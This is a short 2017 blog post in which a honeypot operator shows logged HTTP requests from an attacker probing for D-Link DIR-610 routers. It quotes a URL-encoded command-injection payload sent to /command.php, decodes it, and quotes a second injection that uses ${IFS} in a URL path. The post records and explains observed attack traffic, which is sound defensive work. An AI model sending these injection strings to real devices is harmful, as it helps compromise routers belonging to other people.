Meine Blog-Liste

  • end of life - Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots h...
    vor 1 Jahr

Mittwoch, 11. Januar 2017

DIR-610 exploit attack seen on Honeypot

On my honeypot I come across this sort of attach quite often, we need to keep in mind that my honeypot will reply always with "200 OK" whatever you send to it.

Interesting to see is how the requests involved, like reported on a different post, I tend to believe that the "200 OK" actually causes the real exploit attempt.
2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /cgi/common.cgi HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /stssys.htm HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'GET / HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'POST /command.php HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 208\r\n\r\ncmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74']}
translated with urllib.unqoute() to
ncmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

After the first view attempts, the attacker should have a pretty good idea that the systems behaves like a DIR-610 system, as the honeypot tells that all urls tested before are actually present.
The command executed makes the file available which the attacker tries to download afterwards in the following call:
2017-01-09 16:53:57 -- {'http': ['181.223.38.29', 'GET /language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}